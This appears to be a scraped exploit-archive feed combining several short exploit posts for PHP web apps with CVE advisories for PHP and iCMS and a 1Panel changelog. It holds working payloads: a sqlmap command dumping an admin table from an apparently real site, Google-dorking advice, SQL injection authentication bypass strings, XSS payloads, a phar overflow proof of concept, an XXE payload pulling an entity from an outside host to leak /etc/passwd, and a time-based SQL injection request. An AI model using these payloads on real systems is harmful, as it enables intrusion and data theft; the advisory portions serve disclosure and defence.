FlatApp Premium Admin Dashboard version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : FlatApp - Premium Admin Dashboard 1.0 SQL injection Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://themeforest.net/item/flatapp-premium-admin-dashboard-template/4961564?ref=pixelcave                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /business-detail.php?lid=15003 <===== inject here [+] D:\sqlmap>sqlmap.py -u https://wwmrigindiacom/business-detail.php?lid=15003 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dump -D mrigindi_new1 -T admin_loginGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

FlatApp Premium Admin Dashboard 1.0 SQL Injection

Greeva version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Greeva 2.0 Auth By Pass Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://coderthemes.com/greeva/index.html                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pas = 1'or'1'='1[+] http://127.0.0.1/wsb-patho.com/sbpatho_system/pap_system/dist/auth-login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Greeva 2.0 SQL Injection

Easy Web Portal version 2.1.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Easy Web Portal v2.1.1 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.p30vel.ir                                                                                               || # Dork      : EWP a été construit avec Easy Web Portal v2.1.1                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /tst/index.php .[+] URL encoded GET input admin was set to 0' onmouseover=prompt(976752) bad='[+] The input is reflected inside a tag parameter between single quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Easy Web Portal 2.1.1 Cross Site Scripting

Easy Password Manager version 1.1 suffers from an administrative information disclosure vulnerability.

    ====================================================================================================================================| # Title     : Easy Password Manager v1.1 unauthorized administrative access Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codelist.cc/scripts/247302-password-manager-for-rise-crm-v11.html                                          |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  unauthorized access allows you to export all E-mail group .[+]  Use Payload : /export-all-mail-group-csv.php[+]  https://127.0.0.1/mother-of-mangrovecom/xicia/cc/epm/export-all-mail-group-csv.php  Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Easy Password Manager 1.1 Information Disclosure

Easy Member Pro version 3.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Easy Member pro v3.0 Unauthorised Administrative Access Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            || # Vendor    : https://easymemberpro30review.weebly.com/                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] allows for unauthorized administrative access , Causes partial control of the site control panel[+] use payload : 1 - /admin/memberleft.php                   2 - /admin/lefthome.php[+] http://127.0.0.1/easymemberprocom/admin/memberleft.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Easy Member Pro 3.0 Insecure Direct Object Reference

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

In PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. 



**Summary**

Buffer mismanagement in phar_dir_read() causes a buffer overflow and a buffer overread later.

**Details**

https://github.com/php/php-src/blob/be71cadc2f899bc39fe27098042139392e2187db/ext/phar/dirstream.c#L89C1-L116

There are few issues here:

*   The if check to_read == 0 || count < ZSTR_LEN(str_key) is not right.  
    In particular, if this is false we know that count >= ZSTR_LEN(str_key).  
    Furthermore, because of to_read = MIN(ZSTR_LEN(str_key), count); we now actually have: to_read == ZSTR_LEN(str_key).  
    If we have a filename length (i.e. ZSTR_LEN(str_key)) equal to sizeof(php_stream_dirent), then we get ZSTR_LEN(str_key) == count == to_read == sizeof(php_stream_dirent).
    
    Take a look now at this line: ((php_stream_dirent *) buf)->d_name[to_read + 1] = '\0';.  
    Assume sizeof(php_stream_dirent) is 4096 like on most Linuxes. Then we write at offset 4097, which is two bytes outside of buf.  
    This line was actually supposed to use to_read instead of to_read + 1, because now even if it doesn't overflow, it does not properly NUL-terminate the filename. We're just lucky there's a memset above.  
    Correcting that to use to_read doesn't solve the whole problem: it would still overflow because it will write at offset 4096 which is still outside buf.
    
    This means we have a stack information leak and a buffer write overflow.
    
*   Both the memset and the return value assume that count == sizeof(php_stream_dirent).  
    In principle if there are any callers where that count is smaller, a buffer overflow occurs in the memset.  
    However, inside PHP itself I did not find any such caller, but this may be a concern for third-party extensions.
    

**PoC**

I created a reproducer using PHP-8.0 with these configure flags: ./configure --enable-debug --disable-all --enable-phar --with-valgrind using compiler gcc (GCC) 13.1.1 20230429.

Create the malicious Phar file using:

<?php
$phar = new Phar('myarchive.phar');
$phar\->startBuffering();
$phar\->addFromString(str\_repeat('A', PHP\_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar\->stopBuffering();
?>

Trigger the buffer overflow and overread using this script:

<?php
$handle = opendir("phar://./myarchive.phar");
$x = readdir($handle);
closedir($handle);

var\_dump($x);
?>

If you run this in Valgrind, i.e. valgrind ./sapi/cli/php trigger.php you'll find two Valgrind complaints:

    ==42575== Conditional jump or move depends on uninitialised value(s)
    ==42575==    at 0x4847ED8: strlen (vg_replace_strmem.c:501)
    ==42575==    by 0x53BE9C: zif_readdir (dir.c:389)
    ==42575==    by 0x6D05C4: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==42575==    by 0x742F7D: execute_ex (zend_vm_execute.h:55163)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    ==42575==    by 0x788A53: do_cli (php_cli.c:949)
    ==42575==    by 0x789ADB: main (php_cli.c:1337)
    ==42575== 
    ==42575== Syscall param write(buf) points to uninitialised byte(s)
    ==42575==    at 0x4AA2BC4: write (write.c:26)
    ==42575==    by 0x7875EA: sapi_cli_single_write (php_cli.c:261)
    ==42575==    by 0x78768D: sapi_cli_ub_write (php_cli.c:293)
    ==42575==    by 0x611034: php_output_op (output.c:1082)
    ==42575==    by 0x60F2B7: php_output_write (output.c:261)
    ==42575==    by 0x5B3B0D: php_var_dump (var.c:120)
    ==42575==    by 0x5B432A: zif_var_dump (var.c:218)
    ==42575==    by 0x6D031A: ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1234)
    ==42575==    by 0x742F6D: execute_ex (zend_vm_execute.h:55159)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    

The first complaint is because the strlen() function overreads the d\_name buffer because it isn't properly NUL-terminated.  
The second one is because it writes the name using var\_dump, and the name contains (uninitialized) stack data.  
Valgrind won't complain about the stack buffer write overflow, but you can inspect the memory using gdb for example that a piece of the stack gets overwritten.

**Impact**

Exploiting this is difficult to do and heavily depends on the application you're targetting, but possible in theory I think using a combination of stack info leaks and buffer write overflows. People who inspect contents of untrusted phar files could be affected.

CVE-2023-3824: Buffer overflow and overread in phar_dir_read()

In PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8 various XML functions rely on libxml global state to track configuration variables, like whether external entities are loaded. This state is assumed to be unchanged unless the user explicitly changes it by calling appropriate function. However, since the state is process-global, other modules - such as ImageMagick - may also use this library within the same process, and change that global state for their internal purposes, and leave it in a state where external entities loading is enabled. This can lead to the situation where external XML is parsed with external entities loaded, which can lead to disclosure of any local files accessible to PHP. This vulnerable state may persist in the same process across many requests, until the process is shut down. 



**Summary**

After working on the issue some days, we more and more come to the assumption, that the actual issue is lower in the stack than the Nextcloud Server's PHP code. We were able to isolate it to a few lines of plain PHP code (but seemling only after performing a "Nextcloud login")

**Details**

After working on the issue some days, we more and more come to the assumption, that the actual issue is lower in the stack than the Nextcloud Server's PHP code. We were able to isolate it to a few lines of plain PHP code (but seemling only after performing a "Nextcloud login"), see POC below.

**Randomness**

The behaviour seems to depend on some "random" factors. A suggestion at the moment is that it's working on the first run in a PHP/Apache process more often then on reused.

*   We **were never able** to produce it on Nginx with PHP-FPM
*   We **were never able** to produce it on CLI
*   We **were able** to reproduce it with latest maintenance versions of PHP 8.0, 8.1 and 8.2 together with Apache2 on Debian
*   We **were unable** to reproduce it with latest maintenance versions of PHP using Apache2 on Ubuntu, but the original reporter seems to be running on Ubuntu.

We are sorry that we are unable to give a clearer indication here, but think that the issue is to critical to ignore or keep to ourselves, just because we fail to give clear reproduction systems, because to us it seems like any system consuming XML is affected.

The most reliable system to reproduce it on is our "Developer Docker": https://github.com/juliushaertl/nextcloud-docker-dev/#standalone-containers but that comes with quite some overhead. The enabled PHP modules and PHPINFO output is available here https://gist.github.com/juliushaertl/b458983b5fe87b31bd98ff2dc2468e97 On that system a Nextcloud user admin with password admin is automatically created and the attack can then be executed with a PROPFIND against the dav endpoint:

    PROPFIND /remote.php/dav/files/<username>/
    
    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY % remote SYSTEM "https://bin.icewind.me/r/p0gzLJ"> %remote; %intern; n%trick;]>
    <d:propfind  xmlns:d="DAV:" xmlns:oc="http://owncloud.org/ns">
      <d:prop>
        <oc:fileid />
      </d:prop>
    </d:propfind>
    

We hope that you can shed light on the situation, to help keeping the PHP world secure, by either confirm there is an issue somewhere inside PHP, libxml2, Apache2 or something else, or pointing us to something that brings clearness why it only happens sometimes.

**PoC**

<?php
$xml\= "<?xml version='1.0' encoding='utf-8' ?><!DOCTYPE root \[<!ENTITY % remote SYSTEM \\"https://bin.icewind.me/r/p0gzLJ\\"\> %remote; %intern; %trick;\]><D:propfind xmlns:D='DAV:'><D:allprop/></D:propfind>";
libxml\_use\_internal\_errors(true);
$dom = new DOMDocument();
$dom\->loadXML($xml);
echo $dom\->textContent;
foreach (libxml\_get\_errors() as $error) {
		var\_dump($error);
}

If you don't want to run code from our servers, you can replace https://bin.icewind.me/r/p0gzLJ with a link of your own, and make it serve the following content:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; trick SYSTEM 'file://WOOT%payload;WOOT'>">

The problem we are now facing is the following:

In most cases we correctly receive:

    PEReference: %intern; not found on line …, column …
    

the reporter mentioned that when this happens we should try to run it multiple times, and indeed on some systems we received a different response after some runs:

    WOOT{{base64 encoded content of /etc/passwd}}WOOT
    

**Mitigation**

Our current "fix" to the problem is to set an external entity loader (although it's disabled by default and never enabled actively on our side)

libxml\_set\_external\_entity\_loader(function () { return null; });

In most cases that leaves the response unchanged with:

    PEReference: %intern; not found on line …, column …
    

But in "successful" cases it now only responds with the following instead of the base64 encoded password file:

    Failed to load external entity "NULL" on line 0, column 0
    

Interestingly setting the entity loader to null is **not** enough and still leaves the system vulnerable:

libxml\_set\_external\_entity\_loader(null);

**Impact**

*   What: The result is a XXE with potential to escalate into a RCE
*   Who: Every application/library/server that is parsing/interacting with XML documents

CVE-2023-3823: Security issue with external entity loading in XML without enabling it

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the where parameter at admincp.php.

\[CVE-ID\]

CVE-2023-39805

\------------------------------------------

\[Description\]

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability

via the where parameter at admincp.php.

\------------------------------------------

\[Vulnerability Type\]

SQL Injection

\------------------------------------------

\[Vendor of Product\]

icmsdev

\------------------------------------------

\[Affected Product Code Base\]

icms V7.0.16 - V7.0.16

\------------------------------------------

\[Affected Component\]

icms<=V7.0.16

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Information Disclosure\]

true

\------------------------------------------

\[Attack Vectors\]

POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF\_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq\_XXz5vaYOwEoS\_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1

Cookie: iCMS\_ADMIN\_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC\_CewgaX5uR1iNHfEz\_Pj20qTaPC\_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG\_SESSION=11807

field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+\*+FROM+(SELECT(SLEEP(10)))testsql)

\------------------------------------------

\[Has vendor confirmed or acknowledged the vulnerability?\]

true

\------------------------------------------

\[Discoverer\]

chubby

\------------------------------------------

\[Reference\]

http://icms.com

http://icmsdev.com

CVE-2023-39805: CVE-2023-39805

1Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, an arbitrary file write vulnerability could lead to direct control of the server. In the `api/v1/file.go` file, there is a function called `SaveContentthat,It `recieves JSON data sent by users in the form of a POST request. And the lack of parameter filtering allows for arbitrary file write operations. Version 1.5.0 contains a patch for this issue.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 新特性**

*   【网站】支持 PHP 运行环境类型网站切换版本。 by @zhengkunwang223 in #1748
*   【网站】支持网站设置重定向。 by @zhengkunwang223 in #1731
*   【数据库】支持添加 MySQL 远程数据库。 by @ssongliu in #1744
*   【主机】增加进程守护管理。 by @zhengkunwang223 in #1786

**2.2 功能优化**

*   【网站】网站设置 IPv6 功能优化。 by @zhengkunwang223 in #1732
*   【网站】网站防盗链页面样式优化。 by @zhengkunwang223 in #1807
*   【网站】网站设置页面添加反向代理时支持用户选择传输协议。 by @zhengkunwang223 in #1832
*   【网站】编辑 PHP 运行环境后增加关联应用重建的提示信息。 by @zhengkunwang223 in #1896
*   【应用商店】应用升级时增加备份选项。 by @zhengkunwang223 in #1750
*   【应用商店】已安装应用列表增加 HTTPS 类型端口的跳转功能。 by @zhengkunwang223 in #1870
*   【应用商店】全部应用和已安装应用列表页面样式优化。 by @zhengkunwang223 in #1895
*   【应用商店】应用依赖 Redis 时，创建页面自动填充 Redis 密码。 by @zhengkunwang223 in #1826
*   【数据库】数据库密码校验规则优化。 by @ssongliu in #1815
*   【数据库】数据库连接信息样式优化。 by @ssongliu in #1857
*   【容器】容器创建页面部分字段翻译优化。 by @SkyAerope in #1797
*   【主机】文件列表记录文件浏览器最后一次访问的路径。 by @zhengkunwang223 in #1753
*   【主机】文件列表页面适配移动端。 by @wangdan-fit2cloud in #1730
*   【主机】监控页面调整数据默认采集间隔和保存时间。 by @ssongliu in #1795
*   【面板设置】创建系统快照前停止所有定时任务。 by @ssongliu in #1888
*   【面板设置】服务器地址支持设置域名。 by @ssongliu in #1778
*   【面板设置】备份账号页面部分按钮样式优化。 by @ssongliu in #1893
*   【面板设置】创建快照逻辑优化。 by @ssongliu in #1805
*   【系统】登录页增加切换语言选项。 by @zhengkunwang223 in #1752
*   【系统】部分页面样式适配移动端。 by @wangdan-fit2cloud in #1891
*   【系统】移除不必要的 SSH Session 连接。 by @LeeEirc in #1780
*   【系统】部分页面分页排序样式优化。 by @ssongliu in #1821
*   【系统】创建抽屉页面不再动态显示名称。 by @ssongliu in #1777

**2.3 问题修复**

*   【网站】修复了部分场景下创建 PHP 运行环境异常的问题。 by @zhengkunwang223 in #1882
*   【应用商店】修复了应用升级后无法编辑最新配置的问题。 by @zhengkunwang223 in #1824
*   【应用商店】修复了更新应用列表后可能出现多个同名应用的问题。 by @zhengkunwang223 in #1827
*   【应用商店】修复了 Cloudreve 升级后数据丢失的问题。 by @zhengkunwang223 in #1822
*   【应用商店】修复了编辑应用时关闭高级设置之后没有提示端口放开的问题。 by @zhengkunwang223 in #1887
*   【应用商店】修复了安装应用时数据库密码包含 & $ 等特殊字符时提示错误的问题。 by @zhengkunwang223 in #1809
*   【数据库】修复了数据库日志监听未刷新的问题。 by @ssongliu in #1823
*   【容器】修复了编辑容器时不显示手动挂载的挂载卷的问题。 by @ssongliu in #1783
*   【容器】修复了编辑容器时由于端口冲突导致容器被删除的问题。 by @ssongliu in #1770
*   【主机】修复了文件压缩时无法选择文件夹的问题。 by @zhengkunwang223 in #1802
*   【主机】修复了当 SSH 登录日志涉及多个年份时导致数据异常的问题。 by @ssongliu in #1785
*   【面板设置】修复了同步快照路径错误的问题。 by @ssongliu in #1863
*   【系统】修复了系统安装在根目录时导致升级失败的问题。 by @ssongliu in #1776

**2.4 应用商店**

*   新增 JumpServer。 by @wojiushixiaobai in 1Panel-dev/appstore#238
*   新增 SFTPGo。 by @wanghe-fit2cloud in 1Panel-dev/appstore#269
*   新增 PGAdmin4。 by @wojiushixiaobai in 1Panel-dev/appstore#246
*   新增 frp。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Discuz。 by @okxlin in 1Panel-dev/appstore#227
*   新增 Nextcloud。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Domain Admin。 by @mouday in 1Panel-dev/appstore#278
*   新增 emlog。 by @emlog in 1Panel-dev/appstore#276
*   新增 ZFile。 by @okxlin in 1Panel-dev/appstore#299
*   新增 MeiliSearch。 by @CyJaySong in 1Panel-dev/appstore#219
*   新增 ChatGPT Web。 by @okxlin in 1Panel-dev/appstore#274
*   新增 Home Assistant。 by @okxlin in 1Panel-dev/appstore#299
*   AdGuardHome 版本升级至 v0.107.36。 by @renovate in 1Panel-dev/appstore#293
*   OpenResty 版本升级至 1.21.4.2-0。 by @wuhang2003 in 1Panel-dev/appstore#300
*   Tailchat 版本升级至 v1.8.8。 by @renovate in 1Panel-dev/appstore#305
*   青龙 版本升级至 v2.16.0。 by @renovate in 1Panel-dev/appstore#306
*   ddns-go 版本升级至 v5.6.0。 by @renovate in 1Panel-dev/appstore#307
*   Memos 版本升级至 v0.14.3。 by @renovate in 1Panel-dev/appstore#304
*   Jenkins 版本升级至 v2.418。 by @renovate in 1Panel-dev/appstore#312
*   Cloudreve 版本升级至 v3.8.2。 by @renovate in 1Panel-dev/appstore#308
*   Alist 版本升级至 v3.25.1。 by @renovate in 1Panel-dev/appstore#309

**2.5 安全更新**

*   修复了部分文件接口存在任意文件读取漏洞的问题。 (CVE-2023-39964)
*   修复了部分文件接口存在任意文件下载漏洞的问题。 (CVE-2023-39965)
*   修复了部分文件接口存在任意文件写入漏洞的问题。 (CVE-2023-39966)

Tag

#php